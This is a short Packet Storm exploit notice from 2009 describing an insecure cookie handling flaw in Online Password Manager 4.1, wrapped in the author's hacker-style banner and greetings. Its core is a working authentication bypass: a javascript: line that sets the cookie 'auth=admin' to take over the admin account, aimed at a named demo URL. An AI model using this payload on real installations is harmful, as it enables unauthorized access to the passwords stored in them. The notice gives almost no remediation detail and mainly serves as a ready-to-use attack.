Online Password Manager 4.1 Insecure Cookie

2009-04-16T00:00:00
ID PACKETSTORM:76735
Type packetstorm
Reporter ZoRLu
Modified 2009-04-16T00:00:00

Description

                                        
                                            `[~] Online Password Manager v4.1 Insecure Cookie Handling Vulnerability   
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 15.04.2009  
[~]  
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com   
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S  
[~]  
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com  
[~] -----------------------------------------------------------  
  
  
yildirimordulari.com/OPM/main.php  
  
Exploit:  
  
javascript:document.cookie = "auth=[nick]; path=/";  
  
  
Exploit for demo:  
  
http://www.esoftpro.com/demo/OPM/main.php  
  
javascript:document.cookie = "auth=admin; path=/";  
  
  
[~] ----------------------------------------------------------------------  
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & stack  
[~]  
[~] yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com  
[~]  
[~] ----------------------------------------------------------------------  
  
  
`